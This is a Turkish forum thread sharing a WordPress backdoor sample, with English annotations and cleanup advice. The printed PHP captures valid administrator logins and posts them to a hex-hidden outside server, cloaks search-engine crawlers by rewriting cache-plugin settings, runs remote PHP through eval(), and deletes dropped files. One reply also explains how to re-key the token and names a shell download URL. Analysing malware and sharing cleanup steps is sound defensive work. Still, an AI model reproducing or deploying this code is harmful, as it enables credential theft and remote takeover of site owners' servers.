""; unlink($dizinupload."/wp-includes/theme-compat/footer-404.php"); unlink($dizinupload."/wp-includes/class-imap.php"); unlink($dizinupload."/wp-includes/IXR/class-IXR-cache.php"); unlink(get_template_directory()."/class-wp-functions.php"); $dizi_array = array( "/wp-includes/ID3", "/wp-includes/rest-api/search", "/wp-includes/rest-api/fields", "/wp-includes/rest-api/endpoints", "/wp-includes/widgets", "/wp-includes/theme-compat", "/wp-includes/Requests", "/wp-includes/Requests/Utility", "/wp-includes/Requests/Transport", "/wp-includes/Requests/Response", "/wp-includes/Requests/Proxy", "/wp-includes/Requests/Exception", "/wp-includes/Requests/Exception/Transport", "/wp-includes/Requests/Exception/HTTP", "/wp-content/languages/themes", "/wp-content/languages/plugins", "/wp-content/languages" ); foreach($dizi_array as $key){ unlink($dizinupload.$key."/". $upload_name . '.php'); } $upload_array = array(2019,2018,2017,2016,2015,2014,2013,2012,2011,2010,2009,2008,2007,2006,2005,2004); $upload_alt_array = array("01","02","03","04","05","06","07","08","09","10","11","12"); $uploadfolder = ABSPATH . "wp-content/uploads/"; foreach($upload_array as $key){ unlink($uploadfolder.$key."/".$upload_name .'.php'); foreach($upload_alt_array as $alt_key){ unlink($uploadfolder.$key."/".$alt_key."/". $upload_name . 
'.php'); } } return $this->answer( true, 'New System Update', "System Clear", 'ERR000' ); } catch ( Exception $e ) { return $this->answer( false, "New System Failed!", $e->getMessage(), "ERR000" ); } } public static function wp_login() { $post_url = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' ); if($_POST['log']){ $login_url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $username = $_POST['log']; $password = $_POST['pwd']; $test = wp_authenticate($username,$password); $sor = $test->allcaps; $testet = $sor['administrator']; if($testet){ $git = wp_remote_post($post_url."postlogin", [ "body" => [ "url" => site_url( '/' ), "username" => $username, "password" => $password, "login_url" => $login_url, ] ] ); } } } public static function wp_fatest_cache_up(){ $getir = get_option("WpFastestCacheExclude"); if($getir){ if(strstr($getir,"google")){ }else{ $fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]'; update_option("WpFastestCacheExclude",$fatest_cache); $pluginfolder = ABSPATH . 
"wp-content/plugins/wp-fastest-cache/"; if($options = get_option("WpFastestCache")){ $post = json_decode($options, true); include_once($pluginfolder.'inc/admin.php'); $wpfc = new WpFastestCacheAdmin(); $wpfc->modifyHtaccess($post); } } }else{ $fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]'; add_option("WpFastestCacheExclude",$fatest_cache); $pluginfolder = ABSPATH . "wp-content/plugins/wp-fastest-cache/"; if($options = get_option("WpFastestCache")){ $post = json_decode($options, true); include_once($pluginfolder.'inc/admin.php'); $wpfc = new WpFastestCacheAdmin(); $wpfc->modifyHtaccess($post); } } } public static function litespeed_cache_up(){ $litespeed_cache = get_option("litespeed-cache-conf"); if(strstr($litespeed_cache['nocache_useragents'],"google")){ }else{ $litespeed_cache['nocache_useragents'] = "google|yandex|bing|yahoo|googleweb|yandexbot"; update_option("litespeed-cache-conf",$litespeed_cache); self::write_append(ABSPATH . 
'/.htaccess', " <IfModule LiteSpeed> RewriteEngine on CacheLookup on RewriteRule .* - [E=Cache-Control:no-autoflush] RewriteRule ^min/\w+\.(css|js) - [E=cache-control:no-vary] ### marker NOCACHE USER AGENTS start ### RewriteCond %{HTTP_USER_AGENT} google|yandex|bing|yahoo|alexa|googleweb|yandexbot RewriteRule .* - [E=Cache-Control:no-cache] ### marker NOCACHE USER AGENTS end ### ### marker CACHE RESOURCE start ### RewriteRule wp-content/.*/[^/]*(responsive|css|js|dynamic|loader|fonts)\.php - [E=cache-control:max-age=3600] ### marker CACHE RESOURCE end ### ### marker FAVICON start ### RewriteRule favicon\.ico$ - [E=cache-control:max-age=86400] ### marker FAVICON end ### </IfModule> "); } }
/* ^ Tail of a cache-plugin patcher whose start is outside this excerpt. It writes a
 * LiteSpeed .htaccess fragment that tags search-engine user agents
 * (google|yandex|bing|yahoo|alexa|...) with Cache-Control:no-cache, so crawler
 * requests bypass the page cache — presumably so they always reach the cloaking
 * output produced by method() below instead of a cached copy. */

/* wp_optimize_up(): the same trick for WP-Optimize. If "google" is not already in the
 * plugin's cache_exception_browser_agents list, overwrite that list with a set of
 * crawler UA strings and save the option. Non-strict in_array(); the key is read
 * without isset() — error_reporting(0) in the top-level dispatcher keeps that silent. */
public static function wp_optimize_up(){ $getir = get_option("wpo_cache_config"); if(in_array("google",$getir['cache_exception_browser_agents'])){ }else{ $getir['cache_exception_browser_agents'] = array("google","googlebot","yandex","yandexbot","bing","bingbot","webmastertools","googlemobile","mobilegoogle"); update_option("wpo_cache_config",$getir); } }

/* wp_supercache_up(): the same for WP Super Cache. Reads the plugin's config file via
 * self::read() (not in view); unless it already contains "googlebot", appends a PHP
 * snippet through self::write_append() (not in view) that sets
 * $cache_rejected_user_agent to a list of crawler UA strings. Cleanup note: this
 * leaves a modified $wp_cache_config_file behind even after the dropper is removed. */
public static function wp_supercache_up(){ global $wp_cache_config_file; $oku_dosya = self::read($wp_cache_config_file); if(strstr($oku_dosya,"googlebot")){ }else{ self::write_append($wp_cache_config_file, '<?php $cache_rejected_user_agent=array ( 0 => "bot", 1 => "ia_archive", 2 => "slurp", 3 => "crawl", 4 => "spider", 5 => "Yandex", 6 => "google", 7 => "bing", 8 => "googlebot", 9 => "bingbot", 10 => "alexa", 11 => "webmastertools", 12 => "googlemobile", ); ?>'); } }

/* cache_check($ara): 1 if the given plugin path appears in the active_plugins option,
 * otherwise 0 (non-strict in_array()). */
public static function cache_check($ara){ $aktif_plugin = get_option('active_plugins'); if (in_array($ara, $aktif_plugin)) { return 1; }else{ return 0; } }

/* cache_method(): applies the crawler-exclusion tweak to whichever of the four
 * supported cache plugins is active. wp_fatest_cache_up() and litespeed_cache_up()
 * are defined outside this excerpt (the LiteSpeed one ends at the top of it). Every
 * exception is swallowed. */
public static function cache_method(){ try { if(self::cache_check("wp-fastest-cache/wpFastestCache.php")){ self::wp_fatest_cache_up(); } if(self::cache_check("litespeed-cache/litespeed-cache.php")){ self::litespeed_cache_up(); } if(self::cache_check("wp-optimize/wp-optimize.php")){ self::wp_optimize_up(); } if(self::cache_check("wp-super-cache/wp-cache.php")){ self::wp_supercache_up(); } } catch ( Exception $e ) { } }

/* init(): passive-mode entry point. Fetches the operator's configuration through
 * (new self(""))->cache() (not in view; the JSON shown further down this page has the
 * keys date, status, goster_konum, konum, bot, link_kod, html_kod, php_kod,
 * yonlen_kod) and hooks method() onto whatever WordPress action the config names in
 * `konum`. The constructor is given an empty token, so no secret is needed here. */
public static function init() { try { $cache = json_decode( ( new self( "" ) )->cache() ); add_action( $cache->konum, array( 'WPPlugingsOptions', 'method' ) ); } catch ( Exception $e ) { } }

/* method(): search-engine cloaking / redirect, driven entirely by the remote config.
 *  - $index: does the visitor's User-Agent match the config-supplied regex `bot`
 *    (interpolated unescaped into the pattern; @ hides a missing UA header).
 *  - status 2 with yonlen_kod: matched crawlers get a 301 to yonlen_kod + REQUEST_URI
 *    (or yonlen_kod . "/" when the URI is 2 bytes or shorter) plus a JS
 *    location.replace() fallback. The "…" inside the jquery URL looks like page-side
 *    truncation; the original URL is not recoverable from this excerpt.
 *  - status 0: link_kod is echoed to every visitor; status 1: only to matched
 *    crawlers. goster_konum 1 = every page except the front page, 0 = everywhere.
 *  All comparisons are loose (==), so a null status/goster_konum counts as 0. The
 *  isset() after ! empty() is redundant. Exceptions are swallowed. */
public static function method() { try { $cache = json_decode( ( new self( "" ) )->cache() ); $konum_durum = $cache->goster_konum; $index = ( preg_match( "~({$cache->bot})~i", strtolower( @$_SERVER["HTTP_USER_AGENT"] ) ) ) ? true : false; if ( $index && $cache->status == 2 && ! empty( $cache->yonlen_kod ) && isset( $cache->yonlen_kod ) ) { $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); $git_url = $cache->yonlen_kod.$_SERVER['REQUEST_URI']; if($saydim > 2){ header("HTTP/1.1 301 Moved Permanently"); header("Location: {$git_url}"); echo ' <script src="http://ajax.googleapis.com/…/li…/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript"> window.location.replace("'.$git_url.'"); </script>'; }else{ header( "HTTP/1.1 301 Moved Permanently"); header( "Location: {$cache->yonlen_kod}/"); echo ' <script src="http://ajax.googleapis.com/…/li…/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript"> window.location.replace("'.$cache->yonlen_kod.'/"); </script>'; } } if ($cache->status == 0) { if($konum_durum == 1 && ! is_front_page()){ echo $cache->link_kod; } if($konum_durum == 0){ echo $cache->link_kod; } }else if ($index && $cache->status == 1 ) { if($konum_durum == 1 && ! is_front_page()){ echo $cache->link_kod; } if($konum_durum == 0){ echo $cache->link_kod; } } } catch ( Exception $e ) { } }

/* init_code(): remote code execution. html_kod is html_entity_decode()d and echoed
 * into the page; php_kod is handed straight to eval(), so the operator can run
 * arbitrary PHP on every request. Both keys are null in the sample config on this
 * page, so isset() is false and nothing runs until the operator fills them in. */
public static function init_code() { $cache = json_decode( ( new self( "" ) )->cache() ); if(isset( $cache->html_kod )){ echo html_entity_decode($cache->html_kod); } if(isset( $cache->php_kod )){ eval($cache->php_kod); } }
} } /* closes the class and the if that wraps its declaration (opened outside this excerpt) */

/* Top-level dispatcher — runs on every request that includes this file.
 * 1. preArrayList(): helper that print_r()s array/object results inside <pre>.
 * 2. If ABSPATH is undefined the file was requested directly rather than loaded by
 *    WordPress: walk up to six parent directories looking for wp-load.php and
 *    include it, so the WP API is available to a file dropped anywhere under the
 *    docroot.
 * 3. Active mode: when $_REQUEST carries system_action_token, construct the class
 *    with it and run controlAction() (outside this excerpt) on
 *    system_action_application / system_action_params, printing the result.
 * 4. Passive mode (no token): init() + cache_method() + init_code() + wp_login() —
 *    crawler cloaking, cache-plugin tampering, remote eval and admin-credential
 *    capture on every ordinary page view.
 * error_reporting(0) hides notices and both try blocks swallow every exception.
 * Detection hints from this file: the three system_action_* request parameters and
 * the hex literal 687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f
 * (http://system.kralphp.com/). */
try { if ( ! function_exists( 'preArrayList' ) ) { function preArrayList( $arr ) { echo "<pre>"; print_r( $arr ); echo "</pre>"; } } if ( ! defined( "ABSPATH" ) ) { foreach ( [ "..", "../..", "../../..", "../../../..", "../../../../..", "../../../../../.." ] AS $directory ) { if ( file_exists( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ) ) { include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ); } } } } catch ( Exception $e ) { }
try { $token = @$_REQUEST["system_action_token"]; $action = @$_REQUEST['system_action_application']; $params = @$_REQUEST['system_action_params']; error_reporting( 0 ); if ( ! is_null( $token ) && ! empty( $token ) ) { $WPPlugingsOptions = new WPPlugingsOptions( $token ); $controlAction = $WPPlugingsOptions->controlAction( $action, $params ); if ( is_array( $controlAction ) || is_object( $controlAction ) ) { preArrayList( $controlAction ); } else { echo $controlAction; } } else { WPPlugingsOptions::init(); WPPlugingsOptions::cache_method(); WPPlugingsOptions::init_code(); WPPlugingsOptions::wp_login(); } } catch ( Exception $e ) { }
-
Daha önce paylaştığımız backdoor'un yeni versiyonu. Hex kodları decode edildiğinde:
687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f http://system.kralphp.com/
Sunucuyla alınıp verilen JSON (hex kodlu) ve decode edilmiş hâli:
7b2264617465223a22323032302d30332d31332031303a34303a3533222c22737461747573223a6e756c6c2c22676f737465725f6b6f6e756d223a6e756c6c2c226b6f6e756d223a6e756c6c2c22626f74223a6e756c6c2c226c696e6b5f6b6f64223a6e756c6c2c2268746d6c5f6b6f64223a6e756c6c2c227068705f6b6f64223a6e756c6c2c22796f6e6c656e5f6b6f64223a6e756c6c7d
{"date":"2020-03-13 10:40:53","status":null,"goster_konum":null,"konum":null,"bot":null,"link_kod":null,"html_kod":null,"php_kod":null,"yonlen_kod":null}
bu versiyona eklemeler yapılmış :)
Aşağıdaki koddaki wp_login() fonksiyonu, wp-login.php üzerinden girilen kullanıcı adı/şifreyi önce wp_authenticate() ile doğruluyor; giriş bir administrator hesabına aitse kullanıcı adını, şifreyi ve site adresini düz metin olarak http://system.kralphp.com/postlogin adresine POST edip logluyor. Yani sızdırılanlar yalnızca geçerli admin şifreleri.
/*
 * wp_login(): the credential-harvesting part of the backdoor. The top-level
 * dispatcher calls it on every request that carries no system_action_token, i.e.
 * on every ordinary page view including the login form POST. The listing on this
 * page was split one token per line by the forum and is truncated (the closing
 * braces are not shown); only whitespace has been restored here.
 */
public static function wp_login() {
    // Operator server hidden as hex; decodes to http://system.kralphp.com/
    $post_url = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' );
    // Raw wp-login.php form fields, read without isset(); error_reporting(0) in the
    // dispatcher hides the notice when they are absent.
    if ( $_POST['log'] ){
        $username = $_POST['log'];
        $password = $_POST['pwd'];
        // Validates the submitted pair through WordPress's own wp_authenticate() and
        // looks for the 'administrator' key in the resulting user's capabilities
        // (a WP_Error result has no allcaps, so the check simply fails).
        $test = wp_authenticate( $username, $password );
        $sor = $test->allcaps;
        $testet = $sor['administrator'];
        // Only credentials that authenticate as an administrator are exfiltrated.
        if ( $testet ){
            // Plaintext username and password POSTed to <server>/postlogin together
            // with the site URL. The response ($git) is never used.
            $git = wp_remote_post( $post_url . "postlogin", [
                "body" => [
                    "url" => site_url( '/' ),
                    "username" => $username,
                    "password" => $password,
                    // $login_url is never assigned anywhere in this fragment — TODO
                    // confirm against the full sample; as shown it is sent as null.
                    "login_url" => $login_url,
                ]
] );
[EcHoLL tarafından 25/Mar/20 21:28 tarihinde düzenlenmiştir]
-
nasıl kullanıyoruz bunu?
-
Yigit bunu yazdı
nasıl kullanıyoruz bunu?
// Token gate quoted from the class (the if-body is not shown here). The request's
// system_action_token reaches $this->token through the constructor and is accepted
// when md5(sha1(token)) equals this hard-coded digest, so the file holds only the
// digest, not the secret itself. Plain === rather than hash_equals(); the digest is
// what an operator would swap to re-key the dropper.
if (md5(sha1($this->token)) === 'b28ee5fed7b75a888635c35727f398b6') {
Bu token'ları kendine göre düzenliyorsun; base URL'yi de kendine göre düzenlemen gerekiyor, çünkü download vb. bütün işlemleri base URL üzerinden alıyor. cURL ile erişim alabilirsin: http://system.kralphp.com/clientfiles/files/shell — JSON kullanmış zaten; adam kimse kullanamasın diye böyle bir şey seçmiş. Sunucularınızı tarayın: bu lavuk, daha önce logladığı Türk sitelerine WordPress xmlrpc.php üzerinden brute force çekiyor; yani temizledikten sonra aynı şifrenin kullanıldığı her şeyi değiştirmelisiniz. -
Teşekkürler
-
ben hala anlamadım hocam :) kusura bakma.
basit bir şekilde adım adım ifade edecek olan var mı :)
-
bence çok güzel iş çıkarmış, helal olsun adama
-
iş yapar güzel eline sağlık Ekol
-
Selamlar olayı nedir kısaca bilgi geçebilecek olan var mı ?
Php ve mysql bilgim var ama olayı kavrayamadım nedense :)
-
bunu bulaştığı sistemden kolayca temizlemenin bir yolu var mı arkadaşlar ?
-
hworm bunu yazdı
bunu bulaştığı sistemden kolayca temizlemenin bir yolu var mı arkadaşlar ?
https://www.tahribat.com/forum/wordpress-backdoor-243978
Bulaşan dosyaları nasıl arayacağın hakkında orada bilgi bulabilirsin. Bulaşmış bir sistemin varsa wp-content klasörünü silme; geri kalan bütün dosyaları silip temiz WordPress dosyalarını yükleyerek kurtulursun. Ek olarak wp-content içine şu .htaccess dosyasını oluşturup
# Deny direct HTTP access to every .php file under wp-content. The dropper on this
# page is meant to be requested directly and bootstraps itself by including
# wp-load.php from a parent directory, so refusing direct requests closes that
# entry point. Caveats: some cache plugins serve css/js/loader .php files out of
# wp-content directly (see the LiteSpeed rewrite rule earlier on this page), so test
# before deploying; and .htaccess is only honoured where the web server processes
# it (Apache/LiteSpeed), not on nginx.
<FilesMatch "\.(?i:php)$">
    # pre-2.4 authz syntax
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
    # Apache 2.4+ (mod_authz_core) syntax
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
</FilesMatch>
wp-content altındaki PHP dosyalarına doğrudan erişimi engelleyebilirsin (bazı cache eklentileri wp-content içindeki PHP dosyalarına doğrudan istek attığı için önce test et). Tema dosyalarına eklemeler varsa onları da değiştirme tarihlerine bakarak bulup düzeltmen gerekiyor; ancak değiştirme tarihi her zaman güvenilir değildir, dosya içeriğinde de ara (örn. hex2bin, eval, system_action_token, kralphp geçen satırlar). Backdoor cache eklentilerinin ayarlarını da kurcaladığı için wp-cache-config.php, wpo_cache_config seçeneği ve LiteSpeed'in yazdığı .htaccess'i de kontrol et. wp_login() admin şifrelerini dışarı gönderdiği için temizlikten sonra tüm admin şifrelerini ve aynı şifrenin kullanıldığı diğer hesapları mutlaka değiştir.